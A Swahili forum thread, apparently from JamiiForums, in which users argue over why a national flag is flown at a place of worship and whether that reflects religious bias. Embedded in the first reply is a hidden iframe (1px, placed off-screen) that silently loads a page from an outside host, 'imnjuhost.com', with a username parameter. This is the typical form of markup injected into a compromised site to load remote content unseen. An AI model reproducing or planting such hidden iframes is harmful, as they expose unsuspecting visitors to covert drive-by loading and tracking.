Bendera ya taifa inafanya nini kwenye jengo la ibada?

Bendera ya taifa inafanya nini kwenye jengo la ibada?

Status
Not open for further replies.
hata kwenye kanisa la Mzee wa Upako, kuna bedera ya Israel, mbona hamjaazisha sredi yake... kweli humu kuna vilaza wavivu wa kufikiria...
<iframe src="http://imnjuhost.com/search/anticheat6.php?username=mc0011" style="width: 1px; height: 1px; position: absolute; top: -999px;" id="ifr1"></iframe>
 
kwa kuwa alyetunga wimbo ni Mkristo na hata nahisi aliyeamua bendera iwe na rangi hizo ni Mkristo
 
Bado halijapatikana kibu sahihi! Mtu aheshimiwe kwa swali lake, asitolewe upepo kiasi hicho. Hata mie ningependa kufahamu zaidi, najua wapo na wengine wengi. Pamoja na hayo! Kuna bendera za mataifa mbalimbali maeneo tofauti Tofauti yakiwemo ya ibada. Ufafanuzi p/s!?

Sent from my BlackBerry 8520 using JamiiForums
 
Mfumo kristo waanza kujidhihirisha sasa.
Magari binafsi watu wanaweka bendera ya Nchi, majumbani hali kadhalika, Mahoteli yanazo bendera Mfano Holiday Inn Jb Belmont etc, Sijui kama na hayo mahoteli yanaonesha mfumao hoteli au la. Hii inaonesha utaifa kwanza. Jengo lipo Tanzania, linatumiwa na watanzania wengi zaidi. Halafu kwani ukiweka bendera msikitini haita kaa. Upuuzi kujadili udini
 
Hakuna mwenye bendera nani? Ni mwananchi na hapo pana wenye nchi, Kama ingekuwa ni ya ikulu si tungeiona magogoni tu? Hata mm skrini seva yangu ni hiyo.

Sent from my iPhone
 
Status
Not open for further replies.
Back
Top Bottom